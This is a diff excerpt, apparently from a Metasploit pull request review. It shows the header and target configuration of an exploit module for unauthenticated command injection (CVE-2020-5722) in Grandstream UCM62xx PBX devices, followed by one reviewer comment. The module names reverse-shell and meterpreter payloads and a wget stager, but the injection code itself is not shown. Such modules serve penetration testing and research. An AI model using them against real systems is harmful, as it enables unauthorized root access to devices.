modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb

```diff
@@ -0,0 +1,176 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE',
+        'Description' => %q{
+          This module exploits unauthenticated SQL and command injection vulnerabilities affecting
+          the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an
+          unauthenticated and remote attacker to execute commands as root. This module affects
+          UCM62xx versions before firmware version 1.0.19.20.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2020-5722' ],
+          [ 'EDB', '48247']
+        ],
+        'DisclosureDate' => '2020-03-23',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_ARMLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'Payload' => {
+                'DisableNops' => true,
+                'BadChars' => '\'&|'
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
```

Comment:
Pretty sure this would be selected as the framework wide default option in this case.